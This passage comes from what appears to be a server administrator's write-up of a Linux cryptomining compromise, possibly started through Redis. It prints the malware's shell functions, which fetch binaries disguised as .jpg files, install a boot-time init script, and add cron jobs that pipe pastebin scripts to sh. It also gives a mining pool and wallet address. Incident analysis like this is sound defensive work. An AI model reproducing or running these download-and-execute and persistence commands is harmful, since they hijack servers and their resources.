    if [ ! -f "/usr/sbin/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        if [ ! -f "/usr/sbin/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        fi
    fi
    if [ ! -f "/etc/init.d/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        if [ ! -f "/etc/init.d/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        fi
    fi
    chkconfig --add kworker
}

function echocron() {
    echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
    echo -e "*/30 * * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "* */10 * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
    rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
    echocron
else
    downloadrun
    init
    echocron
    sleep 10
    port=$(netstat -anp | grep 13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
fi
#
#

  This script closely resembles the previous one and repeats many of its functions, but there are a few changes. As before, the functions first.

downloadrun

  Saves the content of http://thyrsi.com/t6/358/1534495127x-1404764247.jpg to /tmp/kworkerds, makes it executable and runs /tmp/kworkerds in the background.

downloadrunxm

  Saves the content of http://thyrsi.com/t6/358/1534496022x-1404764583.jpg to /bin/config.json and makes it executable (this is the JSON file); also saves the content of http://thyrsi.com/t6/358/1534491798x-1404764420.jpg to /bin/kworkerds, makes it executable and then runs /tmp/kworkerds in the background.

echocron

  Writes cron jobs all over the place.

init

  This function is new. It saves the content of http://thyrsi.com/t6/362/1535175015x-1404817880.jpg to /usr/sbin/kworker and makes it executable (another binary), and saves the content of http://thyrsi.com/t6/362/1535175343x-1566657675.jpg to /etc/init.d/kworker and makes it executable; that one is a shell script, the init script for kworker, and chkconfig --add kworker registers it to start at boot:

#! /bin/bash
#chkconfig: - 99 01
#description: kworker daemon
#processname: /usr/sbin/kworker
### BEGIN INIT INFO
# Provides: /user/sbin/kworker
# Required-Start:
# Required-Stop:
# Default-Start:    2 3 4 5
# Default-Stop:     0 1 6
# Short-Description: kworker deamon
# Description:      kworker deamon
### END INIT INFO

LocalPath="/usr/sbin/kworker"
name='kworker'
pid_file="/var/run/$name.pid"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see$stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping$name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; maystill be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file"]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will notattempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac
exit 0

  With the functions covered, the script as a whole: downloadrun downloads the executable /tmp/kworkerds and runs it in the background; init downloads kworker and configures it to start at boot; echocron sets up cron jobs in three places; sleep 10 waits 10 s; then downloadrunxm downloads /bin/config.json and the executable /tmp/kworkerds and runs it in the background.

4. Reflections

  I have finally finished working through the rough flow of this attacker's program, killed every thread it started and removed every file it downloaded. My analysis is that the initial infection probably happened when Redis was installed and this program somehow got invoked along the way. Without the Alibaba Cloud alerts we might never have noticed, and it would have kept eating our resources and bandwidth. In future: install software through official channels where possible, enable key-based login on the server, and don't install scripts or background programs that aren't needed. All in all, going through a server compromise and digging into its code has been quite a learning experience. One regret is that all of the code and shell scripts are hosted on third-party services and I never found an address belonging to the attacker themselves; it may be buried in the executables, or be tied to "url": "stratum+tcp://xmr.f2pool.com:13531","user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig".
